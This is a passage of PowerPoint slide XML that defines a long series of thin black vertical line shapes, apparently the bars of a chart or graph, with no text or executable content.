                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="100123"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="220" name="object 220"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3633089" y="5494232"/>
            <a:ext cx="2517" cy="196302"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="99060">
                <a:moveTo>
                  <a:pt x="0" y="98624"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="98624"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="828" y="98900"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="221" name="object 221"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3662858" y="5461219"/>
            <a:ext cx="0" cy="229019"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="115569">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="115559"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="222" name="object 222"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3662586" y="5462851"/>
            <a:ext cx="1258" cy="227761"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="114935">
                <a:moveTo>
                  <a:pt x="138" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="138" y="114736"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="223" name="object 223"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3690764" y="5468760"/>
            <a:ext cx="0" cy="221469"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="111760">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="111749"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="224" name="object 224"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3687766" y="5466540"/>
            <a:ext cx="3775" cy="223986"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1905" h="113030">
                <a:moveTo>
                  <a:pt x="0" y="112598"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="112598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1374" y="112874"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="225" name="object 225"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3718669" y="5419414"/>
            <a:ext cx="0" cy="271803"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="137160">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="136655"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="226" name="object 226"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3717850" y="5420456"/>
            <a:ext cx="1258" cy="270545"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="136525">
                <a:moveTo>
                  <a:pt x="138" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="138" y="136130"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="227" name="object 227"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3746521" y="5417271"/>
            <a:ext cx="0" cy="273062"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="137794">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="137732"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="228" name="object 228"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3746248" y="5419414"/>
            <a:ext cx="2517" cy="271803"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="137160">
                <a:moveTo>
                  <a:pt x="828" y="136379"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="828" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="828" y="136379"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="136655"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="229" name="object 229"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3774429" y="5363109"/>
            <a:ext cx="0" cy="327171"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="165100">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="165069"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="230" name="object 230"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3772514" y="5365534"/>
            <a:ext cx="2517" cy="325912"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="164464">
                <a:moveTo>
                  <a:pt x="0" y="163570"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="163570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="828" y="163846"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="231" name="object 231"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3802281" y="5377051"/>
            <a:ext cx="0" cy="313329"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="158114">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="158028"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="232" name="object 232"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3802009" y="5377856"/>
            <a:ext cx="1258" cy="313329"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="158114">
                <a:moveTo>
                  <a:pt x="138" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="138" y="157627"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="233" name="object 233"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3830187" y="5288034"/>
            <a:ext cx="0" cy="402672"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="203200">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="202953"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="234" name="object 234"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3829914" y="5290458"/>
            <a:ext cx="3775" cy="400155"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1905" h="201930">
                <a:moveTo>
                  <a:pt x="1374" y="201454"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1374" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1374" y="201454"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="201730"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5412">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="235" name="object 235"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3857545" y="5292850"/>
            <a:ext cx="0" cy="397638"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="200660">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="200523"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236" name="object 236"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3856974" y="5292850"/>
            <a:ext cx="1258" cy="397638"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="200660">
                <a:moveTo>
                  <a:pt x="75" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="75" y="200523"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="237" name="object 237"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3885399" y="5203320"/>
            <a:ext cx="0" cy="486981"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="245744">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="245698"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238" name="object 238"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3885126" y="5205205"/>
            <a:ext cx="2517" cy="485723"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="245110">
                <a:moveTo>
                  <a:pt x="487" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="487" y="244751"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="239" name="object 239"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3913305" y="5194192"/>
            <a:ext cx="0" cy="497048"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="250825">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="250309"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="240" name="object 240"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3911648" y="5195232"/>
            <a:ext cx="2517" cy="495789"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="250189">
                <a:moveTo>
                  <a:pt x="349" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="349" y="249784"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="241" name="object 241"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3941211" y="5077300"/>
            <a:ext cx="0" cy="614074"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="309880">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="309290"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="242" name="object 242"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3940938" y="5077806"/>
            <a:ext cx="1258" cy="612816"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="635" h="309244">
                <a:moveTo>
                  <a:pt x="200" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="200" y="309042"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="243" name="object 243"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3969065" y="5094986"/>
            <a:ext cx="0" cy="596457"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="300989">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="300371"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="244" name="object 244"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3966324" y="5097410"/>
            <a:ext cx="2517" cy="593941"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1269" h="299719">
                <a:moveTo>
                  <a:pt x="622" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="622" y="299148"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="245" name="object 245"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3996970" y="4979695"/>
            <a:ext cx="0" cy="710967"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="358775">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="358551"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="3175">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="246" name="object 246"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3996397" y="4980734"/>
            <a:ext cx="1258" cy="709709"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
